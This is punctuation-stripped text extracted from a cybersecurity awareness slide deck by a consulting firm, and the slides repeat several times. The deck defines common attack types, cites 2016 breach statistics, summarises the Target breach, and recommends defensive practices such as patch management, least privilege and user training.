means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
